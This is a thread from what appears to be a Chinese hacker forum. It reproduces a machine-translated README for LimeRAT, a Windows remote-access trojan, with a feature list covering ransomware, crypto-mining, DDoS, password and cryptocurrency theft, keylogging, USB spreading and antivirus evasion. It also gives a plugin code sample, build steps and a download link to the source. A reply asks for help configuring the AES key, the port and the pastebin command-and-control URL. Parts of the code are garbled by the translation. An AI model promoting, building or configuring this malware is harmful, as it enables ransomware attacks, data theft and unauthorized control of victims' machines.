• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

求这个远控软件的使用方法【Lime-RAT-master 】


Recommended Posts

LimeRAT v0.1.9

Windows 远程管理工具


描述

适用于 Windows 机器的简单而强大的 RAT。这个项目简单易懂,它应该让你了解 dotNET 恶意软件及其行为方式。


主要特点

  • 。网
    • 用 Visual Basic .NET 编码,客户端需要框架 2.0 或 4.0 依赖项,服务器是 4.0
  • 联系
    • 使用 pastebin.com 作为 ip:port ,而不是 noip.com DNS。并且还使用多端口
  • 插入
    • 使用插件系统来减小存根的大小并降低 AV 检测
  • 加密
    • 服务器和客户端之间的通信使用 AES 加密
  • 传播
    • 感染 USB 驱动程序上的所有文件和文件夹
  • 旁路
    • 低 AV 检测和未检测到的启动方法
  • 轻的
    • 有效负载大小约为 25 KB
  • 反虚拟机
    • 如果机器是虚拟的,请自行卸载以避免扫描或分析
  • 勒索软件
    • 使用 .Lime 扩展名加密所有 HHD 和 USB 上的文件
  • XMR 矿工
    • 具有用户空闲\活动优化的高性能 Monero CPU 矿工
  • 分布式拒绝服务
    • 创建强大的 DDOS 攻击以使在线服务不可用
  • 加密窃取者
    • 窃取加密货币敏感数据
  • 屏幕储物柜
    • 阻止用户访问他们的 Windows GUI
  • 和更多
    • 连接自动任务
    • 强制启用 Windows RDP
    • 持久性
    • 文件管理器
    • 密码窃取者
    • 远程桌面
    • 比特币抓取器
    • 下载器
    • 键盘记录器

先决条件

要打开项目,您需要:

  1. 视觉工作室 2017
  2. 这个存储库

窥视

项目

68747470733a2f2f692e696d6775722e636f6d2f6c6b7a4d3738382e676966

勒索软件

68747470733a2f2f692e696d6775722e636f6d2f615a6a705846652e676966

关键过程

68747470733a2f2f692e696d6775722e636f6d2f554c7146376e352e676966


插件示例

VB.NET

'轻松创建DLL插件
Public  Class  Main 
'Simple Msgbox 
 Public  Shared  Sub  CN( ByVal  H  As  String ,  ByVal  P  As  Integer ,  ByVal  K  As  String ,  ByVal  SP  As  String ,  ByVal  PW  As  String ,  ByVal  FP  As  String ,  ByVal  HW 作为 字符串 ByVal  BT 作为 字符串 ByVal PB 作为 字符串

  Msgbox( "你好客户!" )

  Send( "MSG"  +  SPL  +  "Hello Server!" ) 
  '客户端将消息发送回服务器,消息将显示在[LOG]选项卡中
	
 结束 	
结束 

C#

公共  
{
    // Simple Msgbox 
    public  static  void  CN ( string  H , int  P , string  K , string  SP , string  PW , string  FP , string  HW , string  BT , string  PB )
    {
        Msgbox ( 你好客户! );

        发送 MSG   +  SPL  +   Hello Server!);
		//客户端将消息发送回服务器,消息将显示在 [LOG] 选项卡中
    }
}

测试

  1. 打开“LimeRAT.sln”
  2. 将编译器设置为“调试”模式
  3. 在解决方案资源管理器中,右键单击“解决方案 LimeRAT 项目”并按“重建解决方案”
  4. 按运行按钮。请注意,客户端和服务器都是本地主机

编译

  1. 打开“LimeRAT.sln”
  2. 将编译器设置为“发布”模式
  3. 在解决方案资源管理器中,右键单击“解决方案 LimeRAT 项目”并按“重建解决方案”
  4. 一切都在“\Project_EXE\Release”下
  5. 使用 Ildasm 将 stub.exe 转换为stub.il

下载SRC和编译版本

https://github.com/NYAN-x-CAT/Lime-RAT/releases

This project was only tested on local-lab[LAN]. I did not test it on external-lab[WAN].
Server tested on Windows 10, Client tested on virtual machine windows 7.

笔记

  1. 使用勒索软件时,除非有效负载运行高权限,否则不会删除还原点
  2. 除非有效负载运行高权限,否则 Anti-Kill (BSOD) 将不起作用

发现错误?请在这里报告https://github.com/NYAN-x-CAT/Lime-RAT/issues/new


作者

  • 喵喵猫

支持

 

Link to comment
Share on other sites

刚才 , C19n37K 说:

是哪里出问题?

进入exe的时候有两个需要输入的 一个是aes key,一个是端口,不知道输入啥,进入后有个pastebin URL 也不知道输入啥?

Link to comment
Share on other sites